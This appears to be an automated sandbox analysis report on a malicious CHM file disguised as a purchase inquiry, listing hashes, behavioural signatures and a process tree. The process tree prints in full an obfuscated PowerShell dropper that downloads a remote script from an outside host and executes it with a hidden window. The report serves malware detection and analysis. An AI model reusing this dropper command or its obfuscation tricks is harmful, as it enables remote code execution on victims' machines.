94051fded4b724c89a79985073ecb256af69c26c0e3aff140507184f9436abeb

Analysis

max time kernel
43s
max time network
46s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
27/10/2022, 12:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

inquiry IN-purchase no.00048075063.chm
Size

13KB
MD5

6f6236aed55a7ce730284128bceb4d47
SHA1

1286c98d5e74865d04394c87dd49ba21fab25e0f
SHA256

6d21db2610c241baca4a885f334f9670978ba5a0a055247ff171fa5157588ff9
SHA512

49d64d41e1f17ba7488e74c58b116653bad749e49b9023eb3b09f70039be1848e93f2cfeee9e828c508d6c7d79775b02f86781a5a571d32ad3f7f03b05ebc888
SSDEEP

96:tmdZnn+YwcqkFm2wCXU0bZGLo2C/XgnLwZYCleVe+IF+kTbTFU553rc+nlq/e8Bx:tmdLwcJXhZDV/gtC8elrTFU513lqx3

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://mgcpakistan.com/c12.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1772	powershell.exe
6	1772	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main	hh.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1772	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeIncreaseQuotaPrivilege	1772	powershell.exe
Token: SeSecurityPrivilege	1772	powershell.exe
Token: SeTakeOwnershipPrivilege	1772	powershell.exe
Token: SeLoadDriverPrivilege	1772	powershell.exe
Token: SeSystemProfilePrivilege	1772	powershell.exe
Token: SeSystemtimePrivilege	1772	powershell.exe
Token: SeProfSingleProcessPrivilege	1772	powershell.exe
Token: SeIncBasePriorityPrivilege	1772	powershell.exe
Token: SeCreatePagefilePrivilege	1772	powershell.exe
Token: SeBackupPrivilege	1772	powershell.exe
Token: SeRestorePrivilege	1772	powershell.exe
Token: SeShutdownPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeSystemEnvironmentPrivilege	1772	powershell.exe
Token: SeRemoteShutdownPrivilege	1772	powershell.exe
Token: SeUndockPrivilege	1772	powershell.exe
Token: SeManageVolumePrivilege	1772	powershell.exe
Token: 33	1772	powershell.exe
Token: 34	1772	powershell.exe
Token: 35	1772	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1948	hh.exe
1948	hh.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1948 wrote to memory of 1772	1948	hh.exe	29
PID 1948 wrote to memory of 1772	1948	hh.exe	29
PID 1948 wrote to memory of 1772	1948	hh.exe	29

C:\Windows\hh.exe
"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\inquiry IN-purchase no.00048075063.chm"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://mgcpakistan.com/c12.txt')|P
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1772

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1772-57-0x000007FEF1DB0000-0x000007FEF27D3000-memory.dmp

Filesize
10.1MB

Download
memory/1772-58-0x000007FEEDD90000-0x000007FEEE8ED000-memory.dmp

Filesize
11.4MB

Download
memory/1772-59-0x000000001B820000-0x000000001BB1F000-memory.dmp

Filesize
3.0MB

Download
memory/1772-61-0x00000000027EB000-0x000000000280A000-memory.dmp

Filesize
124KB

Download
memory/1772-60-0x00000000027E4000-0x00000000027E7000-memory.dmp

Filesize
12KB

Download
memory/1772-62-0x00000000027EB000-0x000000000280A000-memory.dmp

Filesize
124KB

Download
memory/1948-54-0x000007FEFB831000-0x000007FEFB833000-memory.dmp

Filesize
8KB

Download